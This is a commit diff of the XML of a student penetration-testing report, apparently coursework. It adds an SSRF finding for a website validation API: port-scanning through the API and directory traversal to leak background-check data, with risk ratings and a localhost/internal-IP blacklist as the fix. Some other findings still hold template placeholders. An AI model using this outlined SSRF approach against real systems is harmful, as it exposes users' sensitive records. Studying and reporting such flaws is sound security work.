<commit_message>
Add server-side request forgery vulnerability detailed finding
</commit_message>
<xml_diff>
--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -558,91 +558,103 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> vulnerability is the stored cross-site scripting in the web application’s anonymous question functionality (Finding 2). This vulnerability allows users to inject a piece of code to the database, which will perform unauthorised actions when triggered. As a result of </w:t>
+        <w:t xml:space="preserve"> vulnerability is the stored cross-site scripting in the web application’s anonymous question functionality (Finding 2). This vulnerability allows users to inject a piece of code to the database, which will perform unauthorised actions when triggered. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>such</w:t>
+        <w:t xml:space="preserve">The third </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve">high-risk </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">users </w:t>
+        <w:t xml:space="preserve">vulnerability </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>will</w:t>
+        <w:t xml:space="preserve">is </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> be able to leak out the server file content which </w:t>
+        <w:t>the</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>can</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> be feeding to </w:t>
+        <w:t>server-side request forgery</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">another high-risk </w:t>
+        <w:t>, which</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">vulnerability – </w:t>
+        <w:t xml:space="preserve"> can be </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>the</w:t>
+        <w:t xml:space="preserve">made through the website validation </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>API</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">server-side request forgery can be </w:t>
+        <w:t xml:space="preserve"> (Finding 3) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>made through the website validation API (Finding 3) based on the information gained from cross-site scripting</w:t>
+        <w:t>t</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> to access sensitive background checks information</w:t>
+        <w:t xml:space="preserve">o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>leak out users’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sensitive background checks information</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -704,16 +716,20 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
+        <w:t xml:space="preserve"> training</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>trainings</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>lookup</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
@@ -5295,7 +5311,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>it happens will significantly decreases.</w:t>
+              <w:t>it happens will significantly decrease.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6382,11 +6398,25 @@
             </w:pPr>
             <w:r>
               <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>The</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:b/>
                 <w:bCs/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>Stored cross-site scripting</w:t>
+              <w:t xml:space="preserve"> s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>tored cross-site scripting</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6406,7 +6436,13 @@
                 <w:bCs/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>anonymous question functionality</w:t>
+              <w:t xml:space="preserve">anonymous question </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>functionality</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6444,7 +6480,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>and when the code is triggered, unauthorised actions with elevated privileges could be performed on behalf the admin users.</w:t>
+              <w:t xml:space="preserve">and when the code is triggered, unauthorised actions with elevated privileges could be performed </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>in the name of</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> admin users.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6513,7 +6561,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> it happens will significantly decreases.</w:t>
+              <w:t xml:space="preserve"> it happens will significantly decrease.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6820,40 +6868,42 @@
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">can perform unauthorised action on behalf of HR team members and fetch files from the server. This vulnerability </w:t>
+              <w:t xml:space="preserve">can perform unauthorised action on behalf of HR team members and fetch files from the server. </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">threatens not only the </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>Since this vulnerability leaks out information about the server, it</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t>HRHub</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t xml:space="preserve"> increases the risk of the server being exploited</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> portal but also potentially any other systems on the server and the server itself. </w:t>
-            </w:r>
-            <w:r>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t>However, s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ame as the SQL injection case, the attacker must already hold a set of valid credentials to exploit the vulnerability.</w:t>
-            </w:r>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7012,22 +7062,7 @@
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">This vulnerability does not only affect the current system but also expose potential risks to the server. </w:t>
-            </w:r>
-            <w:r>
-              <w:t>Moreover, i</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">t also provides critical information for </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">the </w:t>
-            </w:r>
-            <w:r>
-              <w:t>server-side request forgery vulnerability</w:t>
-            </w:r>
-            <w:r>
-              <w:t>.</w:t>
+              <w:t>This vulnerability does not only affect the current system but also expose potential risks to the server.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7233,43 +7268,34 @@
               <w:t>($_POST["question"])</w:t>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:ind w:leftChars="100" w:left="220"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>// then display the question</w:t>
-            </w:r>
-          </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc71325117"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc71325117"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 3 - </w:t>
@@ -7351,10 +7377,154 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Detailed description of the vulnerability, including a risk statement.</w:t>
-            </w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">he </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>se</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>rver-side request forgery</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> presents in the web application’s </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>web validation</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> functionality.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> An attacker can </w:t>
+            </w:r>
+            <w:r>
+              <w:t>induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> [1]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and leaks out sensitive information</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> without authorisations</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>he exploitation requires the attacker to login first so if only specific users have the access to the portal, the likelihood that it happens will significantly decrease.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7411,7 +7581,36 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
+              <w:t>This vulnerability can be exploited by port-scanning the server</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> [2]</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> through the website validation API</w:t>
+            </w:r>
+            <w:r>
+              <w:t>. After f</w:t>
+            </w:r>
+            <w:r>
+              <w:t>inding</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> out the port</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">, we can traverse the directory and eventually leaks out the sensitive information. For a detailed walkthrough, see </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Section_3_–" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 2, Section 3</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7467,26 +7666,27 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve">Negligible/Minor/Moderate/Major/Catastrophic: An attacker could do </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>xyz</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve"> with this vulnerability</w:t>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Major:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>An attacker could steal the background checks information of users by exploiting this vulnerability.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7543,14 +7743,56 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Possible</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">Website validation </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">has strong smell of being a potential server-side request forgery vulnerability since the server normally needs to make requests to the website for validation. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>H</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>owever, exploiting this vulnerability requires the attacker to have a set of login credentials</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> so the likelihood is said to be possible.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7598,23 +7840,45 @@
           <w:p>
             <w:pPr>
               <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Informational / Low / Medium / High / Extreme</w:t>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>High:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">Referring to the risk matrix in </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Appendix_I_-" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 1</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t>, possible likelihood and major impact suggest a high risk.</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> This vulnerability leaks out background checks information which are </w:t>
+            </w:r>
+            <w:r>
+              <w:t>highly</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> sensitive</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7622,9 +7886,6 @@
               <w:widowControl w:val="0"/>
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
-            <w:r>
-              <w:t>This is the reasoning behind my rating</w:t>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7680,14 +7941,81 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>http://example.com</w:t>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">1] </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId11" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:bCs/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:t>https://portswigger.net/web-security/ssrf</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">] </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Lecture 14 SSRF slides</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7734,7 +8062,12 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
               <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="12"/>
+              </w:numPr>
               <w:pBdr>
                 <w:top w:val="nil"/>
                 <w:left w:val="nil"/>
@@ -7743,9 +8076,87 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>The fix goes here</w:t>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>B</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>lacklist</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost, http://127.0.0.1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>, http://0.0.0.0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and http://</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>172.17.0.2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="12"/>
+              </w:numPr>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Close th</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>at</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> port if it is not necessary.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7969,7 +8380,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t xml:space="preserve">Negligible/Minor/Moderate/Major/Catastrophic: An attacker could do </w:t>
+              <w:t xml:space="preserve">Negligible: An attacker could do </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -8047,7 +8458,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+              <w:t>Almost Certain: The possibility of the vulnerability being exploited</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8111,14 +8522,14 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>Informational / Low / Medium / High / Extreme</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
+              <w:t>Medium</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
             <w:r>
               <w:t>This is the reasoning behind my rating</w:t>
             </w:r>
@@ -8491,7 +8902,13 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t xml:space="preserve">Negligible/Minor/Moderate/Major/Catastrophic: An attacker could do </w:t>
+              <w:t>Negligible</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">: An attacker could do </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -8574,7 +8991,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+              <w:t>Possible: The possibility of the vulnerability being exploited</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8643,14 +9060,14 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>Informational / Low / Medium / High / Extreme</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
+              <w:t>Low</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
             <w:r>
               <w:t>This is the reasoning behind my rating</w:t>
             </w:r>
@@ -8839,7 +9256,7 @@
                     <pic:cNvPicPr preferRelativeResize="0"/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId12"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -8959,7 +9376,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Each payload is placed at the end of the finding user API endpoint (</w:t>
       </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
